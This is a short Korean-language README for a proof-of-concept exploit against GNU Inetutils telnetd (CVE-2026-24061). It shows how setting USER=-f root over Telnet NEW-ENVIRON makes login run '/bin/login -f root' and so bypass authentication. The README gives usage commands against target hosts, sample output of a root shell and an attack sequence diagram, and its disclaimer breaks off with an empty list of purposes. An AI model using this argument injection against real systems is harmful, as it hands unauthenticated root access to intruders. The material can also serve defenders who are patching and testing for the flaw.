
GNU Inetutils telnetd 인증 우회(CVE-2026-24061)를 위한 개념 증명 익스플로잇으로, 조작된 NEW-ENVIRON USER 변수를 통해 루트 셸을 실행합니다.
이는 인증을 우회하고 즉시 루트 셸을 생성합니다.
Telnet NEW‑ENVIRON을 통해 클라이언트는 세션 협상 중에 환경 변수를 설정할 수 있습니다.
취약한 telnetd는 USER를 login에 직접 전달합니다:
/bin/login -f "$USER"
공격자는 다음을 설정합니다:
USER=-f root
결과:
/bin/login -f root
-f 플래그는 login이 인증을 건너뛰도록 지시하여 루트 액세스를 허용합니다.
외부 종속성은 필요하지 않습니다.
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
취약한 경우:
# id
uid=0(root) gid=0(root)
#
이제 대화형 루트 셸을 사용할 수 있습니다.
python3 cve-2026-24061.py 10.10.10.20
출력:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root session
이 익스플로잇은 다음을 위해 제공됩니다:
소유하지 않거나 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다.